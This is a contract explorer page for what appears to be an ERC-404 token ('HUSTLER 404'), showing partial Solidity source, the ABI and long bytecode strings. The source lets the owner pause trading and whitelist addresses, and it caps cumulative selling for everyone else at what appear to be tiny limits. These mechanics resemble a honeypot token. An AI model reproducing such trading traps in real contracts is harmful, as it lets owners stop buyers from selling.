        return super._mint(to);
    }

    function tokenURI(uint256 id) public view override returns (string memory) {
        return bytes(baseTokenURI).length > 0 ? string.concat(baseTokenURI, id.toString(), "") : "";
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override virtual whenNotPaused returns (bool){
        if(!whitelist[from]){
            userSelllimit[from] += amount;
            require(userSelllimit[from] <= sellLimit, "not allowed anymore to sell");
        }
        if(!whitelist[to]){
            userBuylimit[to] += amount;
            require(userBuylimit[to] <= buyLimit, "not allowed anymore to buy");
        }
        return super._transfer(from, to, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"address","name":"_owner","type":"address"},{"internalType":"uint256","name":"_initialSupply","type":"uint256"},{"internalType":"uint8","name":"_decimal","type":"uint8"},{"internalType":"uint256","name":"_buylimit","type":"uint256"},{"internalType":"uint256","name":"_selllimit","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"AlreadyExists","type":"error"},{"inputs":[],"name":"EnforcedPause","type":"error"},{"inputs":[],"name":"ExpectedPause","type":"error"},{"inputs":[],"name":"InvalidOwner","type":"error"},{"inputs":[],"name":"InvalidRecipient","type":"error"},{"inputs":[],"name":"InvalidSender","type":"error"},{"inputs":[],"name":"NotFound","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"inputs":[],"name":"ReEntrancyReentrantCall","type":"error"},{"inputs":[],"name":"Unauthorized","type":"error"},{"inputs":[],"name":"UnsafeRecipient","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"ERC20Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"}],"name":"ERC721Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferStarted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[],"name":"acceptOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amountOrId","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseTokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"id","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"owner","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pendingOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_tokenURI","type":"string"}],"name":"setTokenURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"target","type":"address"},{"internalType":"bool","name":"state","type":"bool"}],"name":"setWhitelist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"id","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amountOrId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userBuylimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userSelllimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whitelist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

60c06040523480156200001157600080fd5b506040516200268338038062002683833981016040819052620000349162000468565b868684868833806200006057604051631e4fbdf760e01b81526000600482015260240160405180910390fd5b6200006b8162000318565b50600680546001600160a01b0319166001600160a01b0383161790556002620000958682620005ac565b506003620000a48582620005ac565b5060ff83166080819052620000bb90600a6200078d565b620000c79083620007a5565b60a0525050600f805460ff191690555050600160105550620000eb83600a6200078d565b620000f79085620007a5565b336000908152600760205260409020556200011483600a6200078d565b620001209083620007a5565b6014556200013083600a6200078d565b6200013c9082620007a5565b601555336000908152600e602090815260408083208054600160ff1991821681179092556001600160a01b038a16855293829020805490941617909255815163c45a015560e01b81529151737a250d5630b4cf539739df2c5dacb4c659f2488d92839263c45a0155926004808401938290030181865afa158015620001c5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001eb9190620007bf565b6001600160a01b031663c9c65396826001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000238573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200025e9190620007bf565b6040516001600160e01b031960e084901b1681526001600160a01b0390911660048201523060248201526044016020604051808303816000875af1158015620002ab573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002d19190620007bf565b600580546001600160a01b0319166001600160a01b039290921691821790556000908152600e60205260409020805460ff1916600117905550620007dd9650505050505050565b600180546001600160a01b0319169055620003338162000336565b50565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620003ae57600080fd5b81516001600160401b0380821115620003cb57620003cb62000386565b604051601f8301601f19908116603f01168101908282118183101715620003f657620003f662000386565b816040528381526020925086838588010111156200041357600080fd5b600091505b8382101562000437578582018301518183018401529082019062000418565b600093810190920192909252949350505050565b80516001600160a01b03811681146200046357600080fd5b919050565b600080600080600080600060e0888a0312156200048457600080fd5b87516001600160401b03808211156200049c57600080fd5b620004aa8b838c016200039c565b985060208a0151915080821115620004c157600080fd5b50620004d08a828b016200039c565b965050620004e1604089016200044b565b945060608801519350608088015160ff81168114620004ff57600080fd5b8093505060a0880151915060c0880151905092959891949750929550565b600181811c908216806200053257607f821691505b6020821081036200055357634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620005a757600081815260208120601f850160051c81016020861015620005825750805b601f850160051c820191505b81811015620005a3578281556001016200058e565b5050505b505050565b81516001600160401b03811115620005c857620005c862000386565b620005e081620005d984546200051d565b8462000559565b602080601f831160018114620006185760008415620005ff5750858301515b600019600386901b1c1916600185901b178555620005a3565b600085815260208120601f198616915b82811015620006495788860151825594840194600190910190840162000628565b5085821015620006685787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620006cf578160001904821115620006b357620006b362000678565b80851615620006c157918102915b93841c939080029062000693565b509250929050565b600082620006e85750600162000787565b81620006f75750600062000787565b81600181146200071057600281146200071b576200073b565b600191505062000787565b60ff8411156200072f576200072f62000678565b50506001821b62000787565b5060208310610133831016604e8410600b841016171562000760575081810a62000787565b6200076c83836200068e565b806000190482111562000783576200078362000678565b0290505b92915050565b60006200079e60ff841683620006d7565b9392505050565b808202811582820484141762000787576200078762000678565b600060208284031215620007d257600080fd5b6200079e826200044b565b60805160a051611e6b620008186000396000818161027c01528181610bbd0152610bec0152600081816102c60152610eac0152611e6b6000f3fe608060405234801561001057600080fd5b50600436106101f05760003560e01c806379ba50971161010f578063d547cfb7116100a2578063e30c397811610071578063e30c39781461047f578063e985e9c514610490578063f2fde38b146104be578063f349b173146104d157600080fd5b8063d547cfb714610419578063dd62ed3e14610421578063e0df5b6f1461044c578063e2d6f33a1461045f57600080fd5b8063a22cb465116100de578063a22cb465146103cd578063a9059cbb146103e0578063b88d4fde146103f3578063c87b56dd1461040657600080fd5b806379ba5097146103895780638da5cb5b1461039157806395d89b41146103a25780639b19251a146103aa57600080fd5b80634f91e48c116101875780636352211e116101565780636352211e1461034657806370a0823114610359578063715018a614610379578063751039fc1461038157600080fd5b80634f91e48c1461031657806353d6fd591461031f578063589210d9146103325780635c975abb1461033b57600080fd5b806323b872dd116101c357806323b872dd146102ac578063313ce567146102c157806342842e0e146102fa5780634f02c4201461030d57600080fd5b806306fdde03146101f5578063081812fc14610213578063095ea7b31461025457806318160ddd14610277575b600080fd5b6101fd6104f1565b60405161020a9190611786565b60405180910390f35b61023c6102213660046117b9565b6009602052600090815260409020546001600160a01b031681565b6040516001600160a01b03909116815260200161020a565b6102676102623660046117e9565b61057f565b604051901515815260200161020a565b61029e7f000000000000000000000000000000000000000000000000000000000000000081565b60405190815260200161020a565b6102bf6102ba366004611813565b6106d0565b005b6102e87f000000000000000000000000000000000000000000000000000000000000000081565b60405160ff909116815260200161020a565b6102bf610308366004611813565b610a59565b61029e60045481565b61029e60155481565b6102bf61032d36600461184f565b610b2e565b61029e60145481565b600f5460ff16610267565b61023c6103543660046117b9565b610b61565b61029e61036736600461188b565b60076020526000908152604090205481565b6102bf610b9c565b6102bf610bb0565b6102bf610c18565b6000546001600160a01b031661023c565b6101fd610c61565b6102676103b836600461188b565b600e6020526000908152604090205460ff1681565b6102bf6103db36600461184f565b610c6e565b6102676103ee3660046117e9565b610cda565b6102bf6104013660046118a6565b610cee565b6101fd6104143660046117b9565b610db1565b6101fd610e0f565b61029e61042f366004611941565b600860209081526000928352604080842090915290825290205481565b6102bf61045a36600461198a565b610e1c565b61029e61046d36600461188b565b60116020526000908152604090205481565b6001546001600160a01b031661023c565b61026761049e366004611941565b600a60209081526000928352604080842090915290825290205460ff1681565b6102bf6104cc36600461188b565b610e34565b61029e6104df36600461188b565b60126020526000908152604090205481565b600280546104fe90611a3b565b80601f016020809104026020016040519081016040528092919081815260200182805461052a90611a3b565b80156105775780601f1061054c57610100808354040283529160200191610577565b820191906000526020600020905b81548152906001019060200180831161055a57829003601f168201915b505050505081565b600060045482111580156105935750600082115b1561066a576000828152600b60205260409020546001600160a01b03163381148015906105e457506001600160a01b0381166000908152600a6020908152604080832033845290915290205460ff16155b15610601576040516282b42960e81b815260040160405180910390fd5b60008381526009602090815260409182902080546001600160a01b0319166001600160a01b038881169182179092559251868152908416917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3506106c6565b3360008181526008602090815260408083206001600160a01b03881680855290835292819020869055518581529192917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a35b5060015b92915050565b60045481116109ea576000818152600b60205260409020546001600160a01b0384811691161461071357604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b03821661073a57604051634e46966960e11b815260040160405180910390fd5b336001600160a01b0384161480159061077757506001600160a01b0383166000908152600a6020908152604080832033845290915290205460ff16155b801561079a57506000818152600960205260409020546001600160a01b03163314155b156107b7576040516282b42960e81b815260040160405180910390fd5b6107bf610ea5565b6001600160a01b038416600090815260076020526040812080549091906107e7908490611a8b565b909155506107f59050610ea5565b6001600160a01b0380841660008181526007602090815260408083208054909601909555858252600b815284822080546001600160a01b031990811690941790556009815284822080549093169092559186168252600c9052908120805461085f90600190611a8b565b8154811061086f5761086f611a9e565b60009182526020808320909101546001600160a01b0387168352600c82526040808420868552600d909352909220548154929350839281106108b3576108b3611a9e565b60009182526020808320909101929092556001600160a01b0386168152600c909152604090208054806108e8576108e8611ab4565b600082815260208082208301600019908101839055909201909255838252600d8152604080832054848452818420556001600160a01b038616808452600c8352908320805460018181018355828652938520018690559252905461094c9190611a8b565b6000838152600d602052604080822092909255905183916001600160a01b0380871692908816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91a4826001600160a01b0316846001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e0314876109d3610ea5565b60405190815260200160405180910390a350505050565b6001600160a01b03831660009081526008602090815260408083203384529091529020546000198114610a4657610a218282611a8b565b6001600160a01b03851660009081526008602090815260408083203384529091529020555b610a51848484610ed7565b50505b505050565b610a648383836106d0565b6001600160a01b0382163b15801590610b105750604051630a85bd0160e11b8082523360048301526001600160a01b03858116602484015260448301849052608060648401526000608484015290919084169063150b7a029060a4016020604051808303816000875af1158015610adf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b039190611aca565b6001600160e01b03191614155b15610a5457604051633da6393160e01b815260040160405180910390fd5b610b36611062565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b6000818152600b60205260409020546001600160a01b031680610b975760405163c5723b5160e01b815260040160405180910390fd5b919050565b610ba4611062565b610bae600061108f565b565b610bb8611062565b610be47f00000000000000000000000000000000000000000000000000000000000000006103e8611af4565b601455610c137f00000000000000000000000000000000000000000000000000000000000000006103e8611af4565b601555565b60015433906001600160a01b03168114610c555760405163118cdaa760e01b81526001600160a01b03821660048201526024015b60405180910390fd5b610c5e8161108f565b50565b600380546104fe90611a3b565b336000818152600a602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b6000610ce7338484610ed7565b9392505050565b610cf98585856106d0565b6001600160a01b0384163b15801590610d935750604051630a85bd0160e11b808252906001600160a01b0386169063150b7a0290610d439033908a90899089908990600401611b0b565b6020604051808303816000875af1158015610d62573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d869190611aca565b6001600160e01b03191614155b15610a5157604051633da6393160e01b815260040160405180910390fd5b6060600060138054610dc290611a3b565b905011610dde57604051806020016040528060008152506106ca565b6013610de9836110a8565b604051602001610dfa929190611b5f565b60405160208183030381529060405292915050565b601380546104fe90611a3b565b610e24611062565b6013610e308282611c34565b5050565b610e3c611062565b600180546001600160a01b0383166001600160a01b03199091168117909155610e6d6000546001600160a01b031690565b6001600160a01b03167f38d16b8cac22d99fc7c124b9cd0de2d3fa1faef420bfe791d8c362d765e2270060405160405180910390a350565b6000610ed27f0000000000000000000000000000000000000000000000000000000000000000600a611dd8565b905090565b6000610ee161113b565b6001600160a01b0384166000908152600e602052604090205460ff16610f98576001600160a01b03841660009081526012602052604081208054849290610f29908490611de7565b90915550506015546001600160a01b0385166000908152601260205260409020541115610f985760405162461bcd60e51b815260206004820152601b60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f2073656c6c00000000006044820152606401610c4c565b6001600160a01b0383166000908152600e602052604090205460ff1661104f576001600160a01b03831660009081526011602052604081208054849290610fe0908490611de7565b90915550506014546001600160a01b038416600090815260116020526040902054111561104f5760405162461bcd60e51b815260206004820152601a60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f206275790000000000006044820152606401610c4c565b61105a84848461115f565b949350505050565b6000546001600160a01b03163314610bae5760405163118cdaa760e01b8152336004820152602401610c4c565b600180546001600160a01b0319169055610c5e81611350565b606060006110b5836113a0565b600101905060008167ffffffffffffffff8111156110d5576110d5611974565b6040519080825280601f01601f1916602001820160405280156110ff576020820181803683370190505b5090508181016020015b600019016f181899199a1a9b1b9c1cb0b131b232b360811b600a86061a8153600a850494508461110957509392505050565b600f5460ff1615610bae5760405163d93c066560e01b815260040160405180910390fd5b60008061116a610ea5565b6001600160a01b038087166000908152600760205260408082205492881682529020549192509061119c878787611478565b156111ad5760019350505050610ce7565b6001600160a01b038716600090815260076020526040812080548792906111d5908490611a8b565b90915550506001600160a01b03808716600090815260076020908152604080832080548a019055928a168252600e9052205460ff16611271576001600160a01b038716600090815260076020526040812054611232908590611dfa565b61123c8585611dfa565b6112469190611a8b565b905060005b8181101561126e5761125c89611523565b8061126681611e1c565b91505061124b565b50505b6001600160a01b0386166000908152600e602052604090205460ff166112f657600061129d8483611dfa565b6001600160a01b0388166000908152600760205260409020546112c1908690611dfa565b6112cb9190611a8b565b905060005b818110156112f3576112e18861164b565b806112eb81611e1c565b9150506112d0565b50505b856001600160a01b0316876001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e0314878760405161133b91815260200190565b60405180910390a35060019695505050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60008072184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b83106113df5772184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b830492506040015b6d04ee2d6d415b85acef8100000000831061140b576d04ee2d6d415b85acef8100000000830492506020015b662386f26fc10000831061142957662386f26fc10000830492506010015b6305f5e1008310611441576305f5e100830492506008015b612710831061145557612710830492506004015b60648310611467576064830492506002015b600a83106106ca5760010192915050565b6005546000906001600160a01b0390811690841603611519576006546001600160a01b03908116908516036114de576001600160a01b038316600090815260076020526040812080548492906114cf908490611de7565b9091555060019150610ce79050565b6006546040516001600160a01b03909116904780156108fc02916000818181858888f19350505050158015611517573d6000803e3d6000fd5b505b5060009392505050565b6001600160a01b03811661154a57604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b0381166000908152600c60205260408120805461157090600190611a8b565b8154811061158057611580611a9e565b90600052602060002001549050600c6000836001600160a01b03166001600160a01b031681526020019081526020016000208054806115c1576115c1611ab4565b600082815260208082208301600019908101839055909201909255828252600d81526040808320839055600b825280832080546001600160a01b031990811690915560099092528083208054909216909155518291906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908390a45050565b61165361113b565b610c5e816001600160a01b03811661167e57604051634e46966960e11b815260040160405180910390fd5b60048054600101908190556000818152600b60205260409020546001600160a01b0316156116bf5760405163119b4fd360e11b815260040160405180910390fd5b6000818152600b6020908152604080832080546001600160a01b0319166001600160a01b038716908117909155808452600c835290832080546001818101835582865293852001859055925290546117179190611a8b565b6000828152600d602052604080822092909255905182916001600160a01b038516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a45050565b60005b8381101561177d578181015183820152602001611765565b50506000910152565b60208152600082518060208401526117a5816040850160208701611762565b601f01601f19169190910160400192915050565b6000602082840312156117cb57600080fd5b5035919050565b80356001600160a01b0381168114610b9757600080fd5b600080604083850312156117fc57600080fd5b611805836117d2565b946020939093013593505050565b60008060006060848603121561182857600080fd5b611831846117d2565b925061183f602085016117d2565b9150604084013590509250925092565b6000806040838503121561186257600080fd5b61186b836117d2565b91506020830135801515811461188057600080fd5b809150509250929050565b60006020828403121561189d57600080fd5b610ce7826117d2565b6000806000806000608086880312156118be57600080fd5b6118c7866117d2565b94506118d5602087016117d2565b935060408601359250606086013567ffffffffffffffff808211156118f957600080fd5b818801915088601f83011261190d57600080fd5b81358181111561191c57600080fd5b89602082850101111561192e57600080fd5b9699959850939650602001949392505050565b6000806040838503121561195457600080fd5b61195d836117d2565b915061196b602084016117d2565b90509250929050565b634e487b7160e01b600052604160045260246000fd5b60006020828403121561199c57600080fd5b813567ffffffffffffffff808211156119b457600080fd5b818401915084601f8301126119c857600080fd5b8135818111156119da576119da611974565b604051601f8201601f19908116603f01168101908382118183101715611a0257611a02611974565b81604052828152876020848701011115611a1b57600080fd5b826020860160208301376000928101602001929092525095945050505050565b600181811c90821680611a4f57607f821691505b602082108103611a6f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b818103818111156106ca576106ca611a75565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052603160045260246000fd5b600060208284031215611adc57600080fd5b81516001600160e01b031981168114610ce757600080fd5b80820281158282048414176106ca576106ca611a75565b6001600160a01b038681168252851660208201526040810184905260806060820181905281018290526000828460a0840137600060a0848401015260a0601f19601f85011683010190509695505050505050565b6000808454611b6d81611a3b565b60018281168015611b855760018114611b9a57611bc9565b60ff1984168752821515830287019450611bc9565b8860005260208060002060005b85811015611bc05781548a820152908401908201611ba7565b50505082870194505b505050508351611bdd818360208801611762565b01949350505050565b601f821115610a5457600081815260208120601f850160051c81016020861015611c0d5750805b601f850160051c820191505b81811015611c2c57828155600101611c19565b505050505050565b815167ffffffffffffffff811115611c4e57611c4e611974565b611c6281611c5c8454611a3b565b84611be6565b602080601f831160018114611c975760008415611c7f5750858301515b600019600386901b1c1916600185901b178555611c2c565b600085815260208120601f198616915b82811015611cc657888601518255948401946001909101908401611ca7565b5085821015611ce45787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600181815b80851115611d2f578160001904821115611d1557611d15611a75565b80851615611d2257918102915b93841c9390800290611cf9565b509250929050565b600082611d46575060016106ca565b81611d53575060006106ca565b8160018114611d695760028114611d7357611d8f565b60019150506106ca565b60ff841115611d8457611d84611a75565b50506001821b6106ca565b5060208310610133831016604e8410600b8410161715611db2575081810a6106ca565b611dbc8383611cf4565b8060001904821115611dd057611dd0611a75565b029392505050565b6000610ce760ff841683611d37565b808201808211156106ca576106ca611a75565b600082611e1757634e487b7160e01b600052601260045260246000fd5b500490565b600060018201611e2e57611e2e611a75565b506001019056fea26469706673582212204c1b7d309da6fec7557c70abd6ddaee42a61abca15558dd34294681171e3405f64736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000001200000000000000000000000009b3f3089574dc9b383d6f2986cca15c48aed145a00000000000000000000000000000000000000000000000000000000000000c8000000000000000000000000000000000000000000000000000000000000000900000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000b485553544c4552203430340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007485553544c455200000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101f05760003560e01c806379ba50971161010f578063d547cfb7116100a2578063e30c397811610071578063e30c39781461047f578063e985e9c514610490578063f2fde38b146104be578063f349b173146104d157600080fd5b8063d547cfb714610419578063dd62ed3e14610421578063e0df5b6f1461044c578063e2d6f33a1461045f57600080fd5b8063a22cb465116100de578063a22cb465146103cd578063a9059cbb146103e0578063b88d4fde146103f3578063c87b56dd1461040657600080fd5b806379ba5097146103895780638da5cb5b1461039157806395d89b41146103a25780639b19251a146103aa57600080fd5b80634f91e48c116101875780636352211e116101565780636352211e1461034657806370a0823114610359578063715018a614610379578063751039fc1461038157600080fd5b80634f91e48c1461031657806353d6fd591461031f578063589210d9146103325780635c975abb1461033b57600080fd5b806323b872dd116101c357806323b872dd146102ac578063313ce567146102c157806342842e0e146102fa5780634f02c4201461030d57600080fd5b806306fdde03146101f5578063081812fc14610213578063095ea7b31461025457806318160ddd14610277575b600080fd5b6101fd6104f1565b60405161020a9190611786565b60405180910390f35b61023c6102213660046117b9565b6009602052600090815260409020546001600160a01b031681565b6040516001600160a01b03909116815260200161020a565b6102676102623660046117e9565b61057f565b604051901515815260200161020a565b61029e7f0000000000000000000000000000000000000000000000000000002e90edd00081565b60405190815260200161020a565b6102bf6102ba366004611813565b6106d0565b005b6102e87f000000000000000000000000000000000000000000000000000000000000000981565b60405160ff909116815260200161020a565b6102bf610308366004611813565b610a59565b61029e60045481565b61029e60155481565b6102bf61032d36600461184f565b610b2e565b61029e60145481565b600f5460ff16610267565b61023c6103543660046117b9565b610b61565b61029e61036736600461188b565b60076020526000908152604090205481565b6102bf610b9c565b6102bf610bb0565b6102bf610c18565b6000546001600160a01b031661023c565b6101fd610c61565b6102676103b836600461188b565b600e6020526000908152604090205460ff1681565b6102bf6103db36600461184f565b610c6e565b6102676103ee3660046117e9565b610cda565b6102bf6104013660046118a6565b610cee565b6101fd6104143660046117b9565b610db1565b6101fd610e0f565b61029e61042f366004611941565b600860209081526000928352604080842090915290825290205481565b6102bf61045a36600461198a565b610e1c565b61029e61046d36600461188b565b60116020526000908152604090205481565b6001546001600160a01b031661023c565b61026761049e366004611941565b600a60209081526000928352604080842090915290825290205460ff1681565b6102bf6104cc36600461188b565b610e34565b61029e6104df36600461188b565b60126020526000908152604090205481565b600280546104fe90611a3b565b80601f016020809104026020016040519081016040528092919081815260200182805461052a90611a3b565b80156105775780601f1061054c57610100808354040283529160200191610577565b820191906000526020600020905b81548152906001019060200180831161055a57829003601f168201915b505050505081565b600060045482111580156105935750600082115b1561066a576000828152600b60205260409020546001600160a01b03163381148015906105e457506001600160a01b0381166000908152600a6020908152604080832033845290915290205460ff16155b15610601576040516282b42960e81b815260040160405180910390fd5b60008381526009602090815260409182902080546001600160a01b0319166001600160a01b038881169182179092559251868152908416917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3506106c6565b3360008181526008602090815260408083206001600160a01b03881680855290835292819020869055518581529192917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a35b5060015b92915050565b60045481116109ea576000818152600b60205260409020546001600160a01b0384811691161461071357604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b03821661073a57604051634e46966960e11b815260040160405180910390fd5b336001600160a01b0384161480159061077757506001600160a01b0383166000908152600a6020908152604080832033845290915290205460ff16155b801561079a57506000818152600960205260409020546001600160a01b03163314155b156107b7576040516282b42960e81b815260040160405180910390fd5b6107bf610ea5565b6001600160a01b038416600090815260076020526040812080549091906107e7908490611a8b565b90915